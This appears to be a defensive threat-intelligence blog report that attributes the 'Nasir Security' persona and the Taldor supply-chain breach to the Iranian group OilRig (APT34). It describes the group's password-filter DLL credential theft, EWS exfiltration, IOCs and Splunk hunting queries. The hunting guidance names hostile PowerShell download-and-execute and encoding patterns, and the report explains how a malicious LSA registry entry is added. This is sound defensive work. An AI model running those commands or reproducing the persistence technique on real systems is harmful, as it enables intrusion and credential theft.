New Threat Actor: Nasir

October 23, 2025

This report provides an analysis of the threat actor operating under the name “Nasir Security,” establishing with high confidence that this entity is a new persona or hacktivist front for the well-documented Iranian state-sponsored group known as OilRig (also tracked as APT34, Helix Kitten, and Crambus). The analysis pivots from the group’s public claims surrounding the Taldor cyberattack to a deep technical examination of the incident’s Tactics, Techniques, and Procedures (TTPs), which align directly with OilRig’s established modus operandi. This report is intended to equip Security Operations Center (SOC) analysts, threat hunters, and incident responders with the actionable intelligence required to detect, mitigate, and respond to this evolving threat.

The key findings of this investigation are as follows:

The Taldor Cyberattack as a Supply Chain Compromise: The attack on Taldor Cyber & Security was a sophisticated supply chain compromise (MITRE ATT&CK T1195) initiated through the use of compromised valid accounts (T1078), rather than the exploitation of a software vulnerability. The strategic objective was to leverage Taldor’s position as a managed service provider (MSP) to gain access to its high-value clients within the Israeli defense and intelligence sectors, including the Ministry of Defense, Mossad, the Israel Defense Forces (IDF), Elbit Systems, and Rafael Advanced Defense Systems.
OilRig’s Evolving and Stealthy TTPs: OilRig (APT34) demonstrates a consistent evolution of its toolset and techniques, shifting towards stealthier methods that abuse legitimate enterprise services to evade detection. A recent campaign, detailed in this report, showcases a novel and highly effective exfiltration technique using Microsoft Exchange Web Services (EWS). This is coupled with a sophisticated credential harvesting method that abuses the Windows password filter DLL mechanism to capture plaintext passwords directly from the Local Security Authority (LSA) process, rendering common remediation actions like password resets ineffective.
“Nasir Security” as an Information Operation: The “Nasir Security” persona appears to be a strategic element of a broader information operation. The name, with its clear geopolitical resonance in the context of the ongoing Israel-Hezbollah conflict, serves to create confusion, misattribute state-sponsored cyber espionage activities as hacktivism, and potentially link them to unrelated kinetic events.
Distinction from Physical Sabotage Operations: The highly publicized Hezbollah pager and walkie-talkie explosions in September 2024 were a physical supply chain sabotage operation, involving the pre-positioning of explosives within devices during the manufacturing or distribution process. This event is fundamentally distinct in nature, methodology, and required defensive posture from the network-based cyber intrusions conducted by groups like OilRig.

Defensive efforts against this threat actor must prioritize identity and access management (IAM), behavioral detection methodologies over traditional signature-based controls, and rigorous monitoring of trusted third-party and MSP connections. A specific focus on detecting anomalous PowerShell usage, unauthorized access to the LSA process, and the abuse of mail-based protocols like EWS is critical for effective defense.

Threat Actor Profile: The Emergence of “Nasir Security”

Initial Emergence

The threat actor “Nasir Security” is a recently emerged group with a minimal public footprint. Initial open-source intelligence identified them as a “new ransomware group”. However, their primary and most significant known activity is not related to ransomware deployment but rather a data breach claim targeting a major Israeli technology firm. This discrepancy suggests that the initial classification may have been premature or that the group’s public persona is intentionally fluid.

The Taldor Breach Claim

The group’s sole claim to public notoriety is the cyberattack against Taldor Cyber & Security. In a public statement following the breach, the actor adopted a taunting and politically charged tone, directly admonishing Taldor for its perceived security failures. The statement’s primary purpose was to claim the exfiltration of highly sensitive data belonging to Taldor’s clients, explicitly naming the Israeli Ministry of Defense, Mossad, the IDF, Elbit Systems, and Rafael Advanced Defense Systems. This claim is the cornerstone for understanding the attack’s strategic objective. The targeting of Taldor was not for its own intrinsic value but as a deliberate supply chain attack—a gateway to compromise its roster of sensitive government and defense industry clientele.

“Nasir” as Strategic Misdirection and Information Operation

The selection of the name “Nasir” is highly unlikely to be arbitrary and points toward a calculated information operations tactic. The name holds significant geopolitical resonance, particularly through its phonetic and contextual association with Hassan Nasrallah, the now-deceased leader of Hezbollah. The “Nasir Security” claim against a prominent Israeli target surfaced during a period of intense kinetic conflict between Israel and Hezbollah, which notably included the pager sabotage operation. The success of this potential misdirection is evident in how the “Nasir threat actor” and the Hezbollah pager attacks have been linked in public discourse and queries.

State-sponsored actors, particularly those attributed to Iran (the suspected state sponsor of OilRig), frequently employ hacktivist personas and front groups. This strategy serves multiple purposes: it creates plausible deniability for state involvement, frames espionage operations as politically motivated activism, and advances geopolitical narratives in the information domain.

Therefore, it is a high-confidence assessment that the “Nasir Security” name was deliberately chosen to achieve two primary goals. First, it reframes a sophisticated, state-sponsored espionage operation as a less formal hacktivist attack. Second, it aims to sow confusion and conflate these cyber activities with the separate, physical sabotage operations targeting its regional ally, Hezbollah. This represents a sophisticated layer of information warfare applied on top of a traditional cyber espionage campaign.

Analytical Pivot

Due to the complete lack of unique, independently verifiable TTPs or Indicators of Compromise (IOCs) associated with “Nasir Security” as a standalone entity, and the strong alignment of the Taldor attack’s technical characteristics with a well-documented threat actor, this report will proceed with the assessment that “Nasir Security” is a persona currently in use by OilRig (APT34). The subsequent analysis will focus on the known operational capabilities, toolsets, and behaviors of OilRig to provide actionable intelligence for network defenders.

Case Study: Anatomy of the Taldor Supply Chain Compromise

Attack Overview

On or before September 30, 2024, Taldor Cyber & Security, a major Israeli IT services and managed security provider, was successfully compromised. The incident was not an opportunistic attack but a targeted intrusion focused on Taldor’s internal IT infrastructure and, critically, its privileged access to the managed service environments of its customers. This approach indicates a patient and well-resourced adversary aiming for high-value downstream targets.

Attack Chain Reconstruction

The operational flow of the Taldor compromise follows a classic pattern for sophisticated actors targeting MSPs, prioritizing stealth and the use of legitimate credentials over noisy exploits.

Initial Access: Compromised Valid Accounts (T1078): The initial intrusion vector was the use of compromised employee credentials. Multiple security analyses of the event stress that the attack did not exploit a software vulnerability (CVE) in any Taldor product or public-facing application. This strongly suggests that the initial compromise was achieved through methods such as a successful spearphishing campaign (T1566) or the acquisition of credentials from a prior breach or dark web marketplace.
Privilege Escalation: Domain Accounts (T1078.002): Upon gaining an initial foothold within the network, the attackers escalated their privileges from a standard employee account to “technician-level access” by compromising and utilizing domain accounts. This is a pivotal step in an MSP compromise, as technician-level accounts often possess administrative or near-administrative rights over the infrastructure of multiple downstream customers, making them a primary target for escalation.
Lateral Movement: Remote Services (T1021): With elevated privileges, the attackers leveraged remote services to move laterally within Taldor’s corporate network. While specific protocols were not publicly disclosed, this likely involved standard remote administration tools such as Remote Desktop Protocol (RDP) or other management solutions commonly used in an MSP environment to manage customer systems.
Objective: Supply Chain Compromise (T1195): The overarching strategic goal of the entire operation was to exploit the inherent trust relationship between Taldor and its clients. By compromising the MSP, the threat actor established a powerful and persistent foothold from which to pivot into the networks of Taldor’s customers. The actor’s own statements confirm the objective was to access and exfiltrate data related to the Israeli defense and intelligence establishment, making this a textbook supply chain attack.

An Identity-Based Failure, Not a Product Flaw

The consistent reporting on the absence of a CVE or a specific product vulnerability in the Taldor incident is a critical diagnostic indicator. It explicitly shifts the root cause of the breach away from software security and squarely into the domain of Identity and Access Management (IAM). The likely contributing factors to the success of the attack were failures in foundational identity security controls, such as insufficient multi-factor authentication (MFA) on employee accounts, inadequate monitoring and alerting on the usage of privileged accounts, and poor network segmentation between Taldor’s internal corporate environment and its customer-facing managed service infrastructure.

This type of compromise is far more dangerous and difficult for a SOC to detect than one based on a vulnerability. There is no software patch that can be applied to fix the issue. The malicious activity is conducted using legitimate user credentials and legitimate administrative tools (e.g., RDP, PowerShell). This reality means that defense against this class of TTP requires a fundamental shift in security posture—from a primary focus on vulnerability management to a more mature strategy centered on Identity Threat Detection and Response (ITDR). The Taldor incident powerfully underscores the modern security principle that “identity is the new perimeter.”

Attribution to OilRig (APT34)

While official public attribution remains unconfirmed, multiple security researchers have noted that the TTPs observed in the Taldor attack are highly consistent with the known operational playbook of OilRig (APT34). This includes the specific focus on credential-based initial access, the objective of supply chain compromise, and the persistent targeting of Israeli and Middle Eastern government and technology organizations. This strong circumstantial and TTP-based evidence forms the basis for the deep-dive analysis of OilRig in the subsequent section.

Table 1: MITRE ATT&CK Mapping for the Taldor Incident

Tactic	Technique ID	Technique Name	Description of Use in Taldor Attack
Initial Access	T1566	Phishing	Assessed as the likely method for obtaining the initial set of employee credentials, given the absence of a software vulnerability exploit. Spearphishing is a hallmark of OilRig’s initial access methodology.
Initial Access	T1078	Valid Accounts	The core of the initial intrusion. The attackers used legitimate, albeit compromised, employee credentials to gain their first foothold inside Taldor’s network, bypassing perimeter defenses.
Privilege Escalation	T1078.002	Valid Accounts: Domain Accounts	After initial entry, the attackers escalated privileges by compromising and using privileged domain accounts to gain “technician-level access” to the managed service environment.
Lateral Movement	T1021	Remote Services	The attackers moved laterally through the network by leveraging remote services, a common technique for administrators and attackers alike to access other systems within a compromised environment.
Impact	T1195	Supply Chain Compromise	This was the ultimate objective of the attack. By compromising Taldor, the attackers aimed to exploit the trusted MSP-client relationship to gain access to downstream targets in the Israeli defense sector.

Attributed Actor Deep Dive: OilRig (APT34) Operational Doctrine

Overview and Geopolitical Context

OilRig, also tracked under various aliases including APT34, Helix Kitten, and Crambus, is a sophisticated cyber espionage group that has been operational since at least 2014. The group is widely assessed to have strong ties to the Iranian government, likely operating under the direction of the Iranian Ministry of Intelligence and Security (MOIS) or the Islamic Revolutionary Guard Corps (IRGC).

The primary mission of OilRig is intelligence collection in support of Iranian state interests. Their targeting is geographically focused on the Middle East but extends globally, with a sectoral emphasis on government, finance, energy, telecommunications, and chemical industries. The group is distinguished by its operational persistence, strong operational security, and a continuous cycle of malware development. They frequently introduce new, custom tools for major campaigns to evade signature-based detection, demonstrating a well-resourced and adaptive development capability.

Comprehensive TTP Analysis (Mapped to MITRE ATT&CK)

OilRig’s operational playbook is well-documented and showcases a reliance on stealthy techniques that blend in with legitimate network activity.

Initial Access (TA0001)

Spearphishing (T1566): This remains the group’s most reliable and frequently used entry vector. OilRig crafts meticulous spearphishing emails with weaponized attachments, typically Microsoft Office documents (Excel, RTF) that either exploit known vulnerabilities or contain malicious macros designed to execute a first-stage payload. The lures are often socially engineered and tailored to the target organization or individual, referencing job opportunities, industry-specific reports, or other plausible pretexts.
Exploitation of Public-Facing Application (T1190): While credential-based access is common, OilRig has a demonstrated history of exploiting vulnerabilities in public-facing applications when opportunities arise. A notable example from past campaigns was their use of CVE-2017-11882, a vulnerability in the Microsoft Office Equation Editor, to achieve remote code execution. More recent intelligence indicates their capability to leverage newer vulnerabilities, such as CVE-2024-30088 (a Windows Kernel flaw), for post-exploitation privilege escalation.

Execution (TA0002) and Persistence (TA0003)

Command and Scripting Interpreter: PowerShell (T1059.001): PowerShell is a cornerstone of OilRig’s tradecraft. It is used extensively across the attack lifecycle for execution of commands, delivery of next-stage payloads, and conducting in-memory operations that constitute fileless persistence. This heavy reliance on a legitimate and powerful system administration tool makes their activity difficult to distinguish from benign administrative tasks and evades traditional file-based antivirus solutions.
Scheduled Task/Job (T1053): To ensure their malware survives a system reboot, the group frequently establishes persistence by creating scheduled tasks. These tasks are configured to execute their malicious scripts (often VBScript or PowerShell) at regular intervals, upon user logon, or at system startup.
Registry Run Keys / Startup Folder (T1547.001): In campaigns involving more complex droppers, such as the MrPerfectInstaller tool, the group has been observed modifying registry keys to ensure their malicious components are loaded by core system processes like the Local Security Authority Subsystem Service (LSASS). This is a powerful persistence mechanism that embeds the malware deep within the operating system’s startup sequence.

Credential Access (TA0006)

OS Credential Dumping (T1003): OilRig routinely uses publicly available and well-known tools like Mimikatz and LaZagne to dump credentials from system memory. This allows them to harvest plaintext passwords and hashes for accounts logged into a compromised system, which are then used for lateral movement.
Novel Credential Harvesting via Password Filter DLL: Traditional credential dumping techniques like Mimikatz are effective but also generate significant noise that is often detected by modern Endpoint Detection and Response (EDR) solutions. To overcome this, OilRig developed a stealthier and more persistent method for credential harvesting. The Windows operating system provides a legitimate mechanism for enforcing password policies through custom DLLs, which can be registered to be loaded by the LSA process (lsass.exe). These “password filter” DLLs receive a user’s new password in plaintext every time it is changed, allowing the DLL to validate it against custom complexity rules. OilRig abuses this feature by creating a malicious password filter DLL, psgfilter.dll, and using a dropper to install it. The dropper modifies the registry key HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\Notification Packages to add psgfilter to the list of packages loaded by LSA. This technique is exceptionally effective for several reasons: it leverages a legitimate OS feature, the malicious code is executed within the context of a highly privileged and trusted system process (LSA), and it guarantees access to fresh, plaintext credentials every time a user is forced to reset their password—directly defeating a common incident response and remediation step.

Command and Control (TA0011) and Exfiltration (TA010)

Application Layer Protocol: DNS (T1071.004): A long-standing and characteristic technique for OilRig is the use of DNS tunneling for command and control (C2). They encode C2 communications and exfiltrated data into DNS queries and responses. Because DNS traffic is essential for network operations and is often less scrutinized by security appliances than HTTP/S traffic, this method provides a reliable and stealthy channel for communication with their infrastructure.
Evolution to Abusing Exchange Web Services (EWS): As network monitoring capabilities for DNS anomalies have improved, OilRig has adapted by developing a new C2 and exfiltration channel that blends seamlessly with normal business traffic. The premise is that no traffic is more common or trusted within an enterprise network than internal email. To leverage this, the group developed the .NET backdoor DevicesSrv.exe, which uses the legitimate Microsoft.Exchange.WebServices.dll library to communicate with the organization’s internal Microsoft Exchange server. Using credentials harvested by the psgfilter.dll or other means, the backdoor authenticates to the Exchange server via the EWS API. It then constructs a standard-looking email, attaches stolen files, and sends them to an external, attacker-controlled email address. The operation is so well-integrated that the sent email even appears in the compromised user’s “Sent Items” folder, further legitimizing the activity and making forensic analysis more difficult. This TTP is exceptionally difficult for a SOC to detect as it uses valid credentials, a legitimate and encrypted protocol (EWS over HTTPS), a trusted internal server (Exchange), and a common user action (sending an email with an attachment). It is designed to bypass many traditional Data Loss Prevention (DLP) and network security controls.

Malware and Toolset Arsenal

OilRig’s arsenal is a mix of custom-developed malware, publicly available hacking tools, and legitimate system administration utilities used for malicious purposes (“living off the land”).

Table 2: OilRig (APT34) Malware and Toolset Summary

Tool/Malware Name	Type	Functionality	Associated Campaigns/Years & Source Snippets
MrPerfectInstaller	Dropper	`.NET` dropper responsible for installing the `psgfilter.dll` and `DevicesSrv.exe` backdoor. Stores components in Base64 buffers.	2022-2023 Middle East Campaign
psgfilter.dll	Credential Harvester	A malicious password filter DLL loaded by LSASS to capture plaintext passwords every time a user changes their password.	2022-2023 Middle East Campaign
DevicesSrv.exe	Backdoor	`.NET` backdoor that uses harvested credentials to authenticate to an internal Exchange server via EWS and exfiltrate data as email attachments.	2022-2023 Middle East Campaign
PowerExchange	Backdoor	PowerShell-based backdoor that uses a compromised Exchange Server as a C2 channel, monitoring for emails from attackers and executing embedded commands.	2023 Middle East Government Campaign
Clipog	Info-stealer	An information-stealing malware capable of capturing clipboard data and logging keystrokes.	2023 Middle East Government Campaign
Helminth	Backdoor/RAT	A long-standing backdoor in OilRig’s arsenal, typically delivered via weaponized Office documents. Provides remote access and command execution.	2016-Present
OopsIE	Trojan	A Trojan used in attacks against financial and insurance sectors in the Middle East.	2018
RGDoor	Backdoor	An IIS backdoor deployed on web servers to provide persistent remote access.	2018
BONDUPDATER	Downloader	A downloader component that often works in conjunction with other backdoors. Has been observed using a domain generation algorithm (DGA).	2017-Present
SideTwist	Backdoor	A backdoor variant used in a 2021 campaign targeting organizations in Lebanon.	2021
Saitama	Backdoor	A backdoor delivered via spear-phishing in a 2022 campaign against Jordan’s foreign ministry.	2022
Mimikatz	Credential Dumper	Publicly available tool used to dump credentials from memory. A staple for many APT groups.	Ongoing
Plink	Tunneling Tool	Publicly available command-line connection tool used to create tunnels for lateral movement (e.g., for RDP), blending in with legitimate traffic.	2023
LaZagne	Credential Dumper	Publicly available tool used to harvest stored passwords from a variety of applications and web browsers on a compromised system.	Ongoing

Actionable Intelligence for Security Operations

This section provides consolidated, actionable intelligence derived from the analysis of OilRig’s TTPs and toolsets. It is designed for direct use by SOC teams for detection, hunting, and incident response.

Consolidated Indicators of Compromise (IOCs)

The following table contains a consolidated list of known IOCs associated with various OilRig campaigns. These indicators should be ingested into security tools such as SIEMs, EDR platforms, firewalls, and threat intelligence platforms to generate alerts on known malicious activity.

Table 3: Consolidated Indicators of Compromise (IOCs) for OilRig (APT34)

IOC Type	Value	Description/Context	Source Snippets
File Hash (SHA256)	`6bad09944b3340947d2b39640b0e04c7b697a9ce70c7e47bc2276ed825e74a2a`	Malware sample from 2023 Middle East government campaign.	all available on request
File Hash (SHA256)	`ba620b91bef388239f3078ecdcc9398318fd8465288f74b4110b2a463499ba08`	Malware sample from 2023 Middle East government campaign.
File Hash (SHA256)	`d0bfdb5f0de097e4460c13bc333755958fb30d4cb22e5f4475731ad1bdd579ec`	Malware sample from 2023 Middle East government campaign.
File Hash (SHA256)	`c488127b3384322f636b2a213f6f7b5fdaa6545a27d550995dbf3f32e22424bf`	Malware sample from 2023 Middle East government campaign.
IPv4 Address	`78.47.218[.]106`	C2 infrastructure from 2023 Middle East government campaign.
IPv4 Address	`192.121.22[.]46`	C2 infrastructure from 2023 Middle East government campaign.
IPv4 Address	`151.236.19[.]91`	C2 infrastructure from 2023 Middle East government campaign.
IPv4 Address	`91.132.92[.]90`	C2 infrastructure from 2023 Middle East government campaign.
C2 Domain	`main-google-resolver[.]com`	C2 domain used for HTTP-based C2 in 2016 campaign.
File Path	`%System%\psgfilter.dll`	Malicious password filter DLL dropped by `MrPerfectInstaller`.
File Path	`%ProgramData%\WindowsSoftwareDevices\DevicesSrv.exe`	EWS exfiltration backdoor dropped by `MrPerfectInstaller`.
File Path	`%ProgramData%\WindowsSoftwareDevices\Microsoft.Exchange.WebServices.dll`	Legitimate EWS library dropped alongside backdoor.
File Path	`%Public%\Libraries\LicenseCheck.vbs`	VBScript used for persistence via scheduled task in 2016 campaign.
Registry Key	`HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\Notification Packages`	Modified to include `scecli, psgfilter` to load the malicious password filter.
Scheduled Task	`MSOfficeLicenseCheck`	Scheduled task name used for persistence in 2016 campaign.

Detection Engineering and Threat Hunting Guidance

As OilRig continuously develops new malware with unique file hashes, a resilient detection strategy must focus on their consistent behaviors (TTPs) rather than ephemeral indicators. The following guidance provides hypotheses and logic for hunting OilRig activity.

Hunting for Password Filter Abuse (T1547.001 / T1003)

Hypothesis: The threat actor will register a new, unauthorized password filter DLL to persistently harvest credentials from the LSA.
Detection Logic: The registration of a password filter DLL requires a modification to a specific registry value. The default value in modern Windows versions is typically just scecli. Any additions to this value are extremely rare in normal enterprise environments and should be considered highly suspicious. Monitor for any write operations to the registry value HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages. An alert should be triggered if any process modifies this value to include a new DLL name (e.g., psgfilter). This is a high-fidelity detection for this specific persistence and credential access technique.

Hunting for EWS Abuse (T1071.003 / T1567.002)

Hypothesis: The threat actor will use a compromised user account or a service account to exfiltrate data via EWS to external email domains.
Detection Logic: This requires analyzing Exchange server logs and/or network traffic. Create a baseline of normal EWS activity. Hunt for deviations, such as:
- EWS sessions originating from unusual processes or executables (i.e., not OUTLOOK.EXE or a known server process). Correlate network logs with endpoint process execution logs to identify binaries like DevicesSrv.exe making EWS API calls.
- A sudden and significant increase in the volume of emails with large attachments being sent from a specific user account, especially to a new or previously unknown external recipient domain.
- EWS authentication events that do not correlate with interactive user logons or known application service times.

Hunting for PowerShell-based Execution and Persistence (T1059.001 / T1053)

Hypothesis: The actor will use obfuscated PowerShell commands to execute payloads in memory and will use the native schtasks.exe utility to create persistence.
Detection Logic: Monitor process creation events and command-line arguments.
- Look for powershell.exe processes launched with command-line arguments indicating obfuscation or encoding, such as -enc, -e, -encodedcommand, or IEX (New-Object Net.WebClient).DownloadString.
- Hunt for executions of schtasks.exe /create where the command being scheduled (/tr) points to a .ps1 or .vbs script, particularly if that script resides in an unusual directory like %Public%, %ProgramData%, or a user’s temporary folder.
- Correlate PowerShell execution with preceding activity from certutil.exe, especially the use of the -decode argument, which OilRig has used to deobfuscate and drop multi-stage payloads on disk before execution.

Table 4: Sample Threat Hunting Queries for Detecting OilRig TTPs

TTP	Detection Logic/Hypothesis	Sample Query (Splunk/Sysmon)	Relevant Data Sources
Abuse of Password Filter DLLs	An unauthorized process has modified the LSA Notification Packages registry key to add a malicious DLL.	`index=winevents sourcetype=”XmlWinEventLog:Microsoft-Windows-Sysmon/Operational” EventCode=13 TargetObject=”*\Control\Lsa\Notification Packages”	where Details!= “scecli”
PowerShell Obfuscation	PowerShell is being executed with an encoded command, a common method for hiding malicious scripts.	`index=winevents sourcetype=”XmlWinEventLog:Microsoft-Windows-Sysmon/Operational” EventCode=1 (Image=”\powershell.exe” OR ParentImage=”\powershell.exe”) CommandLine IN (“-enc“, “-encodedcommand“, “-e“)	table _time, host, user, ParentImage, Image, CommandLine`
Persistence via Scheduled Task	The native scheduled task utility is being used to schedule the execution of a script file.	`index=winevents sourcetype=”XmlWinEventLog:Microsoft-Windows-Sysmon/Operational” EventCode=1 Image=”\schtasks.exe” CommandLine=”/create” AND (CommandLine=”.ps1” OR CommandLine=”.vbs*“)	table _time, host, user, CommandLine`
EWS Backdoor Activity	A non-standard process is making network connections typical of EWS traffic (HTTPS to an Exchange server).	`index=sysmon EventCode=3 Protocol=tcp DestinationPort=443	join host, ProcessGuid [search index=sysmon EventCode=1]

Strategic Mitigation and Recommendations

Identity and Access Management (IAM)

Enforce Ubiquitous MFA: The Taldor breach was fundamentally an identity-based failure. The effectiveness of stolen or phished credentials is dramatically reduced if Multi-Factor Authentication (MFA) is enforced on all externally accessible services (e.g., VPN, Outlook Web Access, Citrix) and, critically, for all privileged account access, both on-premises and in the cloud.
Implement Privileged Access Management (PAM): Deploy PAM solutions to vault, manage, and rotate credentials for all privileged accounts, including Domain Administrators and MSP technician accounts. This limits the time window an attacker can use a stolen credential and provides a clear audit trail for all privileged sessions.
Monitor for Credential Abuse: Implement User and Entity Behavior Analytics (UEBA) to detect anomalous logon activity. This includes monitoring for impossible travel scenarios, logons from unfamiliar geolocations or IP ranges, and concurrent sessions from different locations.

Supply Chain and Vendor Risk Management

Adopt a Zero Trust Architecture for MSPs: All network traffic and access attempts originating from MSPs and other trusted third parties should be treated as untrusted by default. Enforce strict, least-privilege access controls and monitor their activity within the network as rigorously as any other user. Do not extend implicit trust based on the source of the connection.
Enforce Network Segmentation: As the Taldor analysis highlights, robust network segmentation is crucial to containing a breach. Prevent lateral movement by segmenting networks to isolate critical production environments from corporate user networks and third-party connection enclaves. An attacker who compromises an MSP should not be able to move freely into sensitive data repositories.

System and Application Hardening

Secure Microsoft Exchange: Given OilRig’s demonstrated abuse of EWS, Exchange servers must be hardened. Restrict EWS access to only the users and applications that absolutely require it. Regularly audit accounts with powerful permissions like Application Impersonation. Closely monitor mail flow rules for unauthorized changes and analyze outbound email traffic for anomalies.
Implement PowerShell Security Controls: Mitigate the risk of malicious PowerShell usage by implementing Constrained Language Mode where full language capabilities are not required. Enable and forward PowerShell Script Block Logging and Module Logging to a central SIEM for analysis. Use application control technologies like Windows Defender Application Control or AppLocker to restrict which users and systems are permitted to execute PowerShell scripts.
Maintain Rigorous Patch Management: While many of OilRig’s TTPs abuse legitimate features, they continue to exploit known vulnerabilities for initial access and privilege escalation. Maintain a rigorous and timely patch management program for all operating systems and third-party applications, prioritizing public-facing systems.

Intelligence Clarification: The Hezbollah Pager and Walkie-Talkie Incident

Nature of the Event

The incidents that occurred on September 17 and 18, 2024, involving the mass detonation of handheld pagers and walkie-talkies used by Hezbollah operatives across Lebanon and Syria, were a sophisticated physical supply chain sabotage operation. This event was not a network-based cyberattack in the conventional sense.

Methodology

Compromise Point: The compromise did not occur over a network but during the physical manufacturing or distribution phase of the devices. Reports indicate that the targeted Gold Apollo AR-924 pagers were compromised before they were ever delivered to Hezbollah.
Payload: The “payload” was not malicious software but a physical one. Tiny quantities of the plastic explosive PETN were meticulously integrated into the devices’ components, likely within the battery packs, making them virtually undetectable through casual inspection.
Trigger Mechanism: The thousands of compromised devices were triggered to detonate simultaneously or in coordinated waves via a remote signal, resulting in widespread casualties and sowing chaos and distrust within the organization’s communication infrastructure.

Contrasting Physical Sabotage with Cyber Espionage

It is critically important for cybersecurity professionals to understand the fundamental distinction between these two types of operations, as the defensive measures required are entirely different. The media and public discourse often use “cyberattack” as a catch-all term for any technologically sophisticated attack, leading to confusion.

The operational doctrine of OilRig, as detailed in this report, is centered on network intrusion. Their TTPs involve phishing, malware deployment, command and control over network protocols (DNS, EWS), and the logical exfiltration of data. Defense against OilRig involves network security monitoring, firewalls, EDR, SIEM, and robust IAM controls.

In contrast, the pager attack’s methodology involved physical access and hardware tampering. Its TTPs included logistics infiltration, covert modification of hardware, and physical emplacement of explosives. Defense against this class of threat falls under the domains of supply chain security, hardware vetting, counter-intelligence, and physical security.

Conclusion for Security Operations

While the Taldor breach and the Hezbollah pager incident are geopolitically related within the broader context of the Iran-Israel conflict, the pager attack falls outside the typical purview and defensive responsibilities of a corporate or government SOC. It represents a different class of threat that is managed through national security, physical security, and supply chain risk management programs, not with network security tools. This report’s focus remains on the tangible, network-based threat posed by OilRig (APT34) operating under the “Nasir Security” persona, which is the relevant and actionable threat for the cybersecurity community.

Shenouda.nl is the personal website of Joe Shenouda, a seasoned cybersecurity expert and CISO, dedicated to providing strategic insights into the global cyber threat landscape through threat intelligence analysis. The site features blog posts on current cyber incidents, such as data breaches, hacktivist activities, and geopolitical cyber conflicts, often mapping threats to frameworks like MITRE ATT&CK and offering defense recommendations. It serves as a resource for professionals in the field, combining Joe’s extensive experience in cyber defense with timely analyses of emerging threats.